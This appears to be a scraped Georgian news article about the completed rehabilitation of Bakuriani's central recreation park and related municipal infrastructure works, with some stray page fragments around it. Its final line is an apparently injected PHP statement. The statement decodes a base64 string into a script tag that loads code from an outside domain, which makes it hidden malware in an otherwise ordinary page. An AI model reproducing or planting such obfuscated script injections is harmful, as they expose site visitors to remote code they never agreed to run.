celsiusi
ავერსი შნაიდერი

რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდმა ბაკურიანის ცენტრალური დასასვენებელი პარკის რეაბილიტაცია დაასრულა. ინფორმაციას საქართველოს მუნიციპალური განვითარების ფონდი ავრცელებს.

მათივე ცნობით, პროექტი მსოფლიო ბანკის ფინანსური მხარდაჭერით შესრულდა და მისმა ღირებულებამ 10.2 მილიონი ლარი შეადგინა.

„ცენტრალური პარკის დასრულებული სამუშოები ადგილობრივი ხელისუფლების წარმომადგენლებთან ერთად მუნიციპალური განვითარების ფონდის აღმასრულებელმა დირექტორმა, დავით ტაბიძემ დაათვალიერა. ბაკურიანის ცენტრალური დასასვენებელი პარკის საერთო ფართობი რვა ჰექტარია. პარკის ტერიტორია დაიყო სხვადასხვა ტიპის – სპორტულ, კულტურულ და რეკრეაციულ ზონებად. რეკრეაციულ პარკში შეიქმნა ისეთი ახალი სივრცეები, რომლებიც ბევრად უფრო კომფორტულს გახდის პარკში დროის გატარებას, როგორც ბავშვებისა და ახალგაზრდებისთვის, ისე დაბის მოსახლეობისა და სტუმრებისთვის.

პარკის ინფრასტრუქტურა სრულად მორგებულია შშმ პირებისა და  საბავშვო ეტლით მოსარგებლე მშობლების საჭიროებებზე. გარდა ამისა, მუნიციპალური განითარების ფონდი დაბა ბაკურიანში 150 ბავშვზე გათვლილ საბავშვო ბაღს აშენებს.

ასევე, დასრულების ეტაპზეა პრემიერ-მინისტრის მიერ ინიცირებული პროგრამა ,,განახლებული რეგიონების“ ფარგლებში მიმდინარე პროექტები, რომლის სამუშაოები, მასშტაბურობიდან გამომდინარე, ორ ეტაპად განხორციელდა. პირველი ეტაპით გათვალისწინებული სამუშაოები უკვე დასრულებილია ბორჯომის, 9 აპრილის, თავისუფლების, მთის, რუსთაველის, აღმაშენებლის ქუჩებზე. პროექტის ფარგელებში მოეწყო ქუჩების მიმდებარე სახლების ღობეები, ჭიშკრები და გარე განათების სისტემა. დასკვნით ფაზაშია მეორე ეტაპით დაგეგმილი სახლების რეაბილიტაცია 9 აპრილის, ბორჯომის, თავისუფლების და აღმაშენებლის ქუჩებზე.

დაბა ბაკურიანში დასრულებული და მიმდინარე ინფრასტრუქტურული პროექტები კურორტს უფრო მეტად კომფორტულს გახდის ვიზიტორებისა და სტუმრებისთვის წელიწადის ოთხივე სეზონზე.

პროგრამა ,,განახლებული რეგიონები“ და ბაღის მშენებლობა საქართველოს მთავრობის დაფინანებით ხორციელდება და ჯამური ინვესტიცია 20.2 მილიონი ლარია“,  – აღნიშნულია საქართველოს მუნიციპალური განვითარების ფონდის ინფორმაციაში.

195
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");